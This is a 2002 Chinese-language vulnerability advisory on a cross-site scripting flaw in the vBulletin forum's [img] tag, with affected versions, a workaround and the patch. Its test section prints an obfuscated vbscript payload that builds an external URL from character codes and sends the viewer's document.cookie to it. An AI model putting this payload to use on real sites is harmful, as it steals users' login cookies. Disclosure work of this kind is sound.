发布日期：2002-03-19
更新日期：2002-03-28

受影响系统：

VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2.0
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0 rc 2

不受影响系统：

VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.3

描述：

---

BUGTRAQ  ID: 4315

vBulletin 是一款商业WEB论坛程序，运行在多种Unix和Linux系统平台下，也可运行于Windows平台下，由PHP实现并可用多种数据库平台支持。

vBulletin 对用户输入过滤上存在漏洞，可使远程攻击者利用在论坛上发贴对其他浏览用户进行跨站脚本执行攻击。

vBulletin支持在帖子中用户使用[img]/[/img]标记插入图象连接，但它未对标记中的内容做充分过滤，这可能导致攻击者在此标记的内容中放入脚本代码，当其他用户浏览相关此连接的时候，脚本将在用户的浏览器中执行。攻击者可能借此得到用户基于COOKIE的认证信息。

<*来源：Cano2 （Cano2@buhaboard.de）
  
  链接：http://archives.neohapsis.com/archives/bugtraq/2002-03/0261.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Cano2 （Cano2@buhaboard.de）提供了如下测试方法：

提交如下的Image标记给服务器程序，浏览包含此标记的用户浏览器中会执行标记中的Javascript代码：

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]



建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在漏洞修复之前暂时关闭Image标记的使用。

厂商补丁：

VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

请下载2.2.3版本的VBulletin:

http://www.vbulletin.com/download/



浏览次数：3804
严重程度：0（网友投票）